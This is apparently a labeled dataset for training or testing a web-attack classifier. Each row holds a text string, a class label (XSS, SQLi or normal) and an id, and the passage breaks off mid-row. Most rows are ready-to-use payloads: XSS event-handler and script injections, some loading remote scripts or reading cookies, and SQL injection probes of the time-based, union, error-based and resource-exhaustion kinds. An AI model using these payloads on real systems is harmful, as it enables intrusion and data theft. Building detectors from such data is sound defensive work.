'%' = ',2,SQLi,19308 "<ol onkeydown=""alert(1)"" contenteditable>test</ol>",1,XSS,5650 -6512'+ ( select 'zdjx' where 5454 = 5454 order by 1--,2,SQLi,18015 Select the most relevant data for analysis.,3,normal,24047 "<optgroup onmousemove=""alert(1)"">test</optgroup>",1,XSS,6068 "<marquee onkeydown=""alert(1)"" contenteditable>test</marquee>",1,XSS,3514 <listing onpointerout=alert(1)>XSS</listing>,1,XSS,7003 "1' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 'ujjr' = 'ujjr",2,SQLi,11657 1' where 8482 = 8482 or sleep ( 5 ) #,2,SQLi,19851 "The Pittsburg charter of 1816 vested the more important powers of the city government in a common council of 15 members and a select council of 9 members, and until 1834 the mayor was appointed annually by these city councils from their own number.",3,normal,25401 Where's the hairdresser?,3,normal,23646 ;sleep(5),2,SQLi,22463 "<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">",1,XSS,7819 -5258 ) or ( 8459 = 8459 ) *4906,2,SQLi,20322 "<ins onmouseenter=""alert(1)"">test</ins>",1,XSS,8134 "<kbd oncopy=""alert(1)"" contenteditable>test</kbd>",1,XSS,5760 <template id=x tabindex=1 onfocusin=alert(1)></template>,1,XSS,4290 "<article onmouseout=""alert(1)"">test</article>",1,XSS,6698 "1"" ) where 1700 = 1700 union all select null,null,null,null,null#",2,SQLi,16717 Delete apps.,3,normal,23081 Select your championship.,3,normal,24931 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#",2,SQLi,15001 "select sleep ( 5 ) and ( ( ( ""wucy"" like ""wucy",2,SQLi,18923 <a id=x tabindex=1 onfocus=alert(1)></a>,1,XSS,7805 "1"" ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19239 "<IMG SRC=x ondblclick=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3262 "1' ) as ibqr where 5372 = 5372 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12816 "The cost of these works had been underestimated, and the report of the Select Committee of the Post Office (Telegraph Department), 1876, states that "" the committee have not received any full and satisfactory explanation of the great differences between the estimated expenditure of 1869 and the actual expenditure incurred up to 1876.""",3,normal,25470 "1'+ ( select 'fxhh' where 2571 = 2571 union all select null,null,null,null,null,null,null--",2,SQLi,14639 <area onpointerover=alert(1)>XSS</area>,1,XSS,8276 select current_user;,2,SQLi,21902 I want to select the right song for the occasion.,3,normal,23778 "To create a bookmark for the current solution, select the Bookmark command from the Edit menu.",3,normal,25281 "<datalist onbeforecopy=""alert(1)"" contenteditable>test</datalist>",1,XSS,2842 "1"" ) ) as spvl where 2242 = 2242 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --",2,SQLi,15161 <content onblur=alert(1) tabindex=1 id=x></content><input autofocus>,1,XSS,2617 "1"" ) where 1416 = 1416 union all select null,null,null#",2,SQLi,17807 "<IMG """"""><SCRIPT>alert("""")</SCRIPT>""\>",1,XSS,8372 "1%"" ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ""%"" = """,2,SQLi,10633 "<rtc onmouseover=""alert(1)"">test</rtc>",1,XSS,8424 "<menuitem onpaste=""alert(1)"" contenteditable>test</menuitem>",1,XSS,3562 1' ) waitfor delay '0:0:5' and ( 'fpnh' = 'fpnh,2,SQLi,18861 "1"" where 2235 = 2235 union all select null,null,null,null,null--",2,SQLi,16808 <tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody>,1,XSS,4083 ">/XaDoS/><script>alert(document.cookie)</script><script src=http://www.site.com/XSS.js""></script>",1,XSS,1513 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'pwuy' = 'pwuy",2,SQLi,14488 "<? foo=""><x foo='?><script>alert(1)</script>'>"">",1,XSS,5860 <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>,1,XSS,5283 "1%"" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12158 "-9023%"" ) ) ) union all select 4490,4490,4490#",2,SQLi,18979 replace,3,normal,23211 "<embed onmouseleave=""alert(1)"">test</embed>",1,XSS,7218 select ( case when ( 8663 = 7467 ) then 8663 else 1/ ( select 0 ) end ) --,2,SQLi,15800 If Beale Street Could Talk hits select theaters on November 30.,3,normal,26063 Select a quote to inspire others.,3,normal,24098 "Marsden, Select Pleas in the Court of Admiralty, published by the Selden Society; Godolphin, View of the Admiral Jurisdiction.",3,normal,25894 "javascript:/*""/*`/*'/*\""/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//>",1,XSS,475 "1%' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( '%' = '",2,SQLi,15346 "<aside oncontextmenu=""alert(1)"">test</aside>",1,XSS,7024 "<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>",1,XSS,1848 1 where 3802 = 3802 and 2006 = 2006,2,SQLi,20043 "Select the ""More"" button next to the video you want to download, and then select ""Download.""",3,normal,25607 1 and 5934 = 7745,2,SQLi,22096 "<li onmouseout=""alert(1)"">test</li>",1,XSS,9018 "<dd onmousedown=""alert(1)"">test</dd>",1,XSS,8951 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( ""khuw"" like ""khuw",2,SQLi,13349 (SELECT pg_sleep(5)),2,SQLi,21734 Select from 30 different games by scrolling through classic box art.,3,normal,25633 Customers may select the product of their choice and use it on a free trial basis before purchase.,3,normal,26257 "1"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""fpwu"" like ""fpwu",2,SQLi,11634 <textarea oncut=alert(1) autofocus>XSS</textarea>,1,XSS,5827 "<div id=""128""><svg><style>&lt;img/src=x onerror=alert(128)// </b>//[""'`-->]]>]</div>",1,XSS,1899 "<video autoplay onplay=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,1853 <footer onpointermove=alert(1)>XSS</footer>,1,XSS,7160 "1"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""onsd"" like ""onsd",2,SQLi,12588 "<style>@keyframes x{}</style><rtc style=""animation-name:x"" onanimationstart=""alert(1)""></rtc>",1,XSS,1683 "<style>@keyframes x{}</style><spacer style=""animation-name:x"" onanimationstart=""alert(1)""></spacer>",1,XSS,1454 "1"" ) as qnmd where 5642 = 5642",2,SQLi,20532 <button onClick=javascript:alert(1)>,1,XSS,8970 -1854' ) as fmmq where 7326 = 7326 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10325 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12",2,SQLi,17003 "1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( 'wdru' like 'wdru",2,SQLi,11752 "1"" ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13326 Select the best restaurant.,3,normal,24282 Filter the spam emails.,3,normal,22652 "1' where 9420 = 9420 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12694 "1 ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 4090 = 4090",2,SQLi,11172 "1%' ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( '%' = '",2,SQLi,12583 "UNION ALL SELECT 1,2",2,SQLi,21731 <script>alert(1);</script>,1,XSS,9672 "For those interested in gaining exposure to these four areas, consider these exchange-traded funds:SPDR Consumer Discretionary Select Sector ETFSPDR Technology Select Sector ETFSPDR Financial Select Sector ETFSPDR Industrial Select Sector ETFBut that's not the only reason Callahan thinks the bull can keep running.",3,normal,26173 "1 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) -- loao",2,SQLi,13566 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></q>",1,XSS,301 "<style>:target {color: red;}</style><xss id=x style=""transition:color 10s"" ontransitioncancel=print()></xss>",1,XSS,1109 "<style>:target {color:red;}</style><noscript id=x style=""transition:color 1s"" ontransitionend=alert(1)></noscript>",1,XSS,852 -2393%' ) ) union all select 2772--,2,SQLi,20064 "-6505' ) ) as jtnp where 1037 = 1037 or elt ( 1032 = 1032,3623 ) --",2,SQLi,16516 -6712' ) ) as kqff where 9146 = 9146 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12287 Select the optimal temperature for comfort.,3,normal,24046 "&lt;A HREF=\""http&#58;//google&#58;ha&#46;ckers&#46;org\""&gt;XSS&lt;/A&gt;",1,XSS,2248 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( 3508 = 3508",2,SQLi,13726 "1 where 6044 = 6044 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11247 ";a=prompt,a()//",1,XSS,9803 "<element onmousemove=""alert(1)"">test</element>",1,XSS,6385 `'><script>\xC2\x85javascript:alert(1)</script>,1,XSS,6088 "<font draggable=""true"" ondragenter=""alert(1)"">test</font>",1,XSS,4120 "1' in boolean mode ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #",2,SQLi,12718 "<div id=""44""><style>*[{}@import'test.css?]{color: green;}</style>X//[""'`-->]]>]</div><div id=""45""><div style=""font-family:'foo[a];color:red;';"">XXX</div>//[""'`-->]]>]</div><div id=""46""><div style=""font-family:foo}color=red;"">XXX</div>//[""'`-->]]>]</div><div id=""47""><svg xmlns=""http://www.w3.org/2000/svg""><script>alert(47)</script></svg>//[""'`-->]]>]</div><div id=""48""><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//[""'`-->]]>]</div><div id=""49""><OBJECT CLASSID=""clsid:333C7BC4-460F-11D0-BC04-0080C7055A83""><PARAM NAME=""DataURL"" VALUE=""javascript:alert(49)""></OBJECT>//[""'`-->]]>]</div><div id=""50""><object data=""data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==""></object>//[""'`-->]]>]</div><div id=""51""><embed src=""data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==""></embed>//[""'`-->]]>]</div><div id=""52""><x style=""behavior:url(test.sct)"">//[""'`-->]]>]</div>",1,XSS,10 Merge records.,3,normal,23073 <li id=x tabindex=1 onbeforeactivate=alert(1)></li>,1,XSS,5369 "{""id"":null,""firstName"":""Anita"",""lastName"":""Tode"",""address"":""145 ROWAN STREET, FAYETTEVILLE NC 28301"",""city"":""270"",""telephone"":""2772673967""}",3,normal,27361 "1'|| ( select 'ctgs' where 6809 = 6809 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13401 "<aside draggable=""true"" ondragend=""alert(1)"">test</aside>",1,XSS,4042 <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>,1,XSS,718 <button onAfterPrint=javascript:alert(1)>,1,XSS,7794 ` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,19572 "1"" ) as jidc where 6093 = 6093 and 9198 = 9198--",2,SQLi,18752 1' WAITFOR DELAY '0:0:5' AND '1337'='1337,2,SQLi,19345 Where did you get that interesting fact from?,3,normal,23785 1 where 6494 = 6494 and 8463 = 2760,2,SQLi,20110 "{""id"":null,""firstName"":""Jayden"",""lastName"":""Goh"",""address"":""75 OAK STREET, PATCHOGUE NY 11772"",""city"":""672"",""telephone"":""6305149671""}",3,normal,27486 "<style>:target {color:red;}</style><ol id=x style=""transition:color 1s"" ontransitionend=alert(1)></ol>",1,XSS,1371 <textarea autofocus onfocus=alert(1)>test</textarea>,1,XSS,5103 "1'+ ( select pxsd where 2576 = 2576 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) ) +'",2,SQLi,12017 1' ) where 7541 = 7541,2,SQLi,21480 "<section draggable=""true"" ondragleave=""alert(1)"">test</section>",1,XSS,3099 "<SCRIPT a="">"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,6169 Delete old photos.,3,normal,22784 "select * from users where id = 1 <@. union select version ( ) ,version ( ) -- 1",2,SQLi,15244 "select * from users where id = 1 or "" ) ]"" or 1 = 1 -- 1",2,SQLi,17583 "?getURL(javascript:alert(1))"",",1,XSS,9575 "{""id"":null,""name"":""vessels""}",3,normal,27341 "<style>:target {color: red;}</style><content id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></content>",1,XSS,776 &lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;,1,XSS,2298 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 9069 = 9069,2,SQLi,16522 "<script onkeypress=""alert(1)"" contenteditable>test</script>",1,XSS,3659 "1'+ ( select 'swxi' where 7651 = 7651 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) +'",2,SQLi,11922 <a href=javascript:alert(1)>click,1,XSS,9385 "-9007 ) as gill where 6462 = 6462 union all select 6462,6462,6462,6462,6462,6462,6462,6462,6462#",2,SQLi,14365 Let's choose a venue for the party.,3,normal,23962 "1%"" ) ) and 6283 = 2068 and ( ( ""%"" = """,2,SQLi,19614 Filter the bright photos.,3,normal,22639 Select your query.,3,normal,24971 "1"" where 4281 = 4281",2,SQLi,21743 I'll select a new game to play online.,3,normal,23828 "<<SCRIPT>alert(""XSS"");//\<</SCRIPT>",1,XSS,8984 1' ) ) waitfor delay '0:0:5' and ( ( 'bbqk' = 'bbqk,2,SQLi,18366 "<bgsound oncontextmenu=""alert(1)"">test</bgsound>",1,XSS,5975 Determine fields where valid.,3,normal,23328 1'+ ( select vfmy where 5711 = 5711,2,SQLi,20112 "{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",""address"":""122 W 3RD STREET, GREENSBURG PA 15601"",""city"":""564"",""telephone"":""2446267002""}",3,normal,26831 "<dir onpaste=""alert(1)"" contenteditable>test</dir>",1,XSS,5634 Where's the perfect spot to enjoy the sunset?,3,normal,23773 1'|| ( select 'yuku' where 7480 = 7480,2,SQLi,19689 1' and 1661 = 1244 and 'dcha' = 'dcha,2,SQLi,19839 "1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11456 "AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE",2,SQLi,19167 <plaintext onpointerdown=alert(1)>XSS</plaintext>,1,XSS,5788 -9509' ) where 9303 = 9303 order by 1#,2,SQLi,19756 <button onDragOver=javascript:alert(1)>,1,XSS,8299 "1%' ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( '%' = '",2,SQLi,11536 "<samp oncopy=""alert(1)"" contenteditable>test</samp>",1,XSS,5469 Select appetizer.,3,normal,24502 "1"" ) and 7533 = 7533 and ( ""jfsw"" like ""jfsw",2,SQLi,19123 "-2111' union all select 1061,1061,1061--",2,SQLi,19493 Join the music band as a guitarist.,3,normal,22976 "<noembed onbeforecopy=""alert(1)"" contenteditable>test</noembed>",1,XSS,3089 "1"" ) ) ) waitfor delay '0:0:5'--",2,SQLi,20273 -6095' ) or 6872 = 6872 and ( 'bfwm' like 'bfwm,2,SQLi,18828 <ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus>,1,XSS,2480 "1' where 7417 = 7417 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14611 "<b draggable=""true"" ondragleave=""alert(1)"">test</b>",1,XSS,5433 "1 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) )",2,SQLi,10839 "1'|| ( select 'fraa' from dual where 9140 = 9140 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) ) ||'",2,SQLi,10125 "select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'",2,SQLi,15470 "1%' and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13429 "1"" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ""bxct"" like ""bxct",2,SQLi,14788 Create a sculpture.,3,normal,22785 Select a hairstyle for a new appearance.,3,normal,24092 "1'|| ( select 'hvqw' from dual where 4423 = 4423 union all select null,null,null--",2,SQLi,15087 "1%' or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13226 <svg><output onload=alert(1)></output>,1,XSS,8458 "1"" where 4064 = 4064 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10341 "select * from users where id = '1' union select @ 1,version ( ) -- 1'",2,SQLi,16262 "<map onkeyup=""alert(1)"" contenteditable>test</map>",1,XSS,5540 "<div draggable=""true"" contenteditable>drag me</div><content ondragover=alert(1) contenteditable>drop here</content>",1,XSS,833 selecting the varying lenghts,3,normal,25566 "1"" ) as ebvt where 5305 = 5305",2,SQLi,20619 "-7923"" ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ""szct"" = ""szct",2,SQLi,16630 "1 ) ) as hgtl where 3864 = 3864 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,16313 "<fieldset onmouseout=""alert(1)"">test</fieldset>",1,XSS,6182 "{""id"":null,""firstName"":""Sim"",""lastName"":""Daniel"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27386 <progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus>,1,XSS,1930 "<style>:target {color:red;}</style><dl id=x style=""transition:color 1s"" ontransitionend=alert(1)></dl>",1,XSS,1372 "<progress draggable=""true"" ondragend=""alert(1)"">test</progress>",1,XSS,3092 "1"" ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,17035 <track onpointerout=alert(1)>XSS</track>,1,XSS,7993 1 ) ) as myxo where 1759 = 1759 union all select null#,2,SQLi,18031 "; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --",2,SQLi,15688 "1"" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""menm"" like ""menm",2,SQLi,14204 "1%"" or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,17414 ( select ( case when ( 6714 = 8872 ) then 1 else 6714* ( select 6714 from master..sysdatabases ) end ) ),2,SQLi,13909 <script>alert(“XSS”);</script>,1,XSS,9569 "<xss id=x style=""transition:outline 1s"" ontransitionend=alert(1) tabindex=1></xss>",1,XSS,1918 Delete the old photos.,3,normal,22686 The Energy Select Sector SPDR ETF (XLE) rose 1.5 percent.,3,normal,25459 Delete the duplicate files.,3,normal,22628 1 ) or sleep ( 5 ),2,SQLi,22048 "-7851"" ) ) or 6872 = 6872 and ( ( ""dvbw"" like ""dvbw",2,SQLi,18398 "1 ) ) as zmsa where 6909 = 6909 union all select null,null,null,null,null,null,null#",2,SQLi,14988 "1, ( select 9100 = ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq' ) )",2,SQLi,13548 <span onpointerup=alert(1)>XSS</span>,1,XSS,8692 "1"" ) where 9461 = 9461 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14915 "1' ) as myxr where 6299 = 6299 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11103 "<spacer onkeypress=""alert(1)"" contenteditable>test</spacer>",1,XSS,3621 <svg><template onload=alert(1)></template>,1,XSS,7428 "<bdi oncut=""alert(1)"" contenteditable>test</bdi>",1,XSS,5989 "1'+ ( select 'utlx' where 6256 = 6256 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) ) +'",2,SQLi,12043 Select arrive.,3,normal,24643 "1%"" ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""%"" = """,2,SQLi,12019 "<li onmousemove=""alert(1)"">test</li>",1,XSS,8920 Where's the police station?,3,normal,23513 "<nextid onmouseout=""alert(1)"">test</nextid>",1,XSS,7183 "-1993%"" ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ""%"" = """,2,SQLi,13002 &lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;,1,XSS,1978 "[a]('javascript:alert(""1"")')",1,XSS,9637 "1"" ) as pgza where 8756 = 8756 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12591 <code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus>,1,XSS,2311 "<blink onbeforepaste=""alert(1)"" contenteditable>test</blink>",1,XSS,3551 &lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;,1,XSS,1768 <nextid onpointerdown=alert(1)>XSS</nextid>,1,XSS,7153 "1%' ) ) ) union all select null,null,null,null--",2,SQLi,18720 "<rtc onkeypress=""alert(1)"" contenteditable>test</rtc>",1,XSS,4964 "A user will see a little dot through their headset and when they want to select an option, they can simply tap the air in front of them to select.",3,normal,26432 ¼script¾alert(¢¢)¼/script¾,1,XSS,9683 <col id=x tabindex=1 onbeforeactivate=alert(1)></col>,1,XSS,4909 Update your wardrobe.,3,normal,22651 "1 ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17058 <address id=x tabindex=1 onfocus=alert(1)></address>,1,XSS,5166 -2504' ) ) ) or 8723 = 9715,2,SQLi,20911 "1 ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,15964 1' where 1692 = 1692,2,SQLi,21890 -4900' ) ) or 7208 = 3236,2,SQLi,21094 1 where 7802 = 7802,2,SQLi,21962 "1"" ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""fbqy"" like ""fbqy",2,SQLi,11448 <svg><animate onbegin=alert(1) attributeName=x dur=1s>,1,XSS,4640 "1' in boolean mode ) union all select null,null,null,null,null,null--",2,SQLi,16291 "<dt onclick=""alert(1)"">test</dt>",1,XSS,9454 "<cite ondblclick=""alert(1)"">test</cite>",1,XSS,8240 "He evinced, as premier of the Cape Colony, the same inability to understand the Uitlanders' grievances, the same futile belief in the eventual fairness of President Kruger, as he had shown when giving evidence before the British South Africa Select Committee into the causes of the Jameson Raid.",3,normal,26126 "<style>@keyframes x{}</style><time style=""animation-name:x"" onanimationend=""alert(1)""></time>",1,XSS,1657 "ABC<div style=""x:\xE2\x80\x85expression(javascript:alert(1)"">DEF",1,XSS,2863 "1'|| ( select 'svgd' from dual where 5188 = 5188 union all select null,null,null,null,null#",2,SQLi,14626 "1'|| ( select 'setd' from dual where 3686 = 3686 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) ) ||'",2,SQLi,10399 <th onpointerleave=alert(1)>XSS</th>,1,XSS,8804 "1 union all select null,null,null,null,null,null#",2,SQLi,18559 "<shadow draggable=""true"" ondragenter=""alert(1)"">test</shadow>",1,XSS,3324 <li onpointerup=alert(1)>XSS</li>,1,XSS,9360 ", if not ( ( select serverproperty ( 'isintegratedsecurityonly' ) ) <> 1 ) waitfor delay '0:0:2' --",2,SQLi,14158 &lt;!&#91;endif&#93;--&gt;,1,XSS,9668 Select the right tool.,3,normal,22574 "<bdo oncut=""alert(1)"" contenteditable>test</bdo>",1,XSS,5905 "<datalist oncut=""alert(1)"" contenteditable>test</datalist>",1,XSS,3863 "top['a'+'l'+'e'+'r'+'t'].apply(this,[1])",1,XSS,8066 "<area onkeydown=""alert(1)"" contenteditable>test</area>",1,XSS,4814 <center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus>,1,XSS,2128 "{""id"":null,""name"":""soft""}",3,normal,27200 UNION ALL SELECT 1--,2,SQLi,21732 Where's the SQL knowledge?,3,normal,23400 "1"" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15567 <footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus>,1,XSS,2090 1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'rjjo' = 'rjjo,2,SQLi,10692 "<div draggable=""true"" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink>",1,XSS,983 "1"" ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""ccuy"" = ""ccuy",2,SQLi,12802 "<;IMG LOWSRC="";javascript:alert(';XSS';);"";>;",1,XSS,6561 ( select ( case when ( 5603 = 5603 ) then 5603 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual ),2,SQLi,13499 select sleep ( 5 ) and ( '%' = ',2,SQLi,20311 "<em onbeforecut=""alert(1)"" contenteditable>test</em>",1,XSS,5269 "1"" ) where 6632 = 6632 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,13138 "<FRAME SRC=""javascript:alert('')",1,XSS,9441 "&lt;OBJECT TYPE=\""text/x-scriptlet\"" DATA=\""http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\""&gt;&lt;/OBJECT&gt;",1,XSS,802 "-2605"" ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ""cikb"" like ""cikb",2,SQLi,10290 "-8933 ) as iiyr where 1974 = 1974 union all select 